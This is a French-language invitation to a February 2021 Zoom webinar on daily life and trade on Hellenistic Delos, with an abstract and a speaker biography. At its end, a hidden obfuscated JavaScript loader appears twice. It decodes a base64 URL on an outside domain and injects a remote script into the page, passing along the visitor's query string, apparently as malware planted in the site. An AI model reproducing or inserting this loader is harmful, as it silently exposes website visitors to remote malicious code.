Defkalion Association Franco-Hellénique Culturelle de Lyon a
de nouveau l’immense plaisir de vous inviter à suivre son troisième
webinaire avec
Hélène Würmser
Maître de conférences en Archéologie et Histoire de l’art grec
à l’Université Lyon 2
le vendredi 26 février 2021 à 19h30 (heure française)
https://zoom.us/j/96134145784?pwd=cnlaWDlkbTZiWVVPc2QxcUVLNElxdz09
ID de réunion : 961 3414 5784 ; Code secret : 559764
Vivre à Délos à l’époque hellénistique :
aspects de la vie quotidienne et de l’économie
suivi d’un débat
Petite par ses dimensions, Délos est une très grande île par son passé historique et le patrimoine archéologique qu’elle recèle. Réputée comme le lieu de naissance d’Apollon et Artémis, elle a également connu un destin extraordinaire par sa situation géographique au cœur de Cyclades et par son importance économique, comme étape essentielle dans le transport des marchandises entre l’Orient et l’Occident. Déclarée port franc par le Sénat romain en 167 av. J.-C., la ville a connu une forte expansion urbaine, destinée à loger une importante population cosmopolite. L’exceptionnelle qualité de conservation des vestiges, ainsi que plus d’un siècle et demi de fouilles organisées sous l’égide de l’Ecole française d’Athènes, nous permettent aujourd’hui encore de connaître les maisons, les décors et les goûts des déliens de la basse époque hellénistique, mais aussi de retracer leurs activités économiques.
Hélène Würmser, est depuis 2010, maître de conférences en Archéologie et Histoire de l’art grec à l’Université Lyon 2. Elle fut membre de l’Ecole française d’Athènes entre 2005 et 2009. Elle a soutenu sa thèse intitulée « les maisons en Grèce à l’époque impériale », en 2008 à Paris IV-Sorbonne. Agrégée de Lettres Classiques, elle est responsable de la fouille et de l’étude de la Maison de Fourni à Délos (Prix spécial du jury de la Fondation Clio en 2018) et responsable de l’IRAA-Lyon (Institut de Recherche sur l’Architecture Antique).
Connectez-vous 10 minutes avant le début de la conférence pour le bon déroulement de la séance.
Vous n’avez pas besoin de télécharger le client zoom, un navigateur vous suffira.
(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();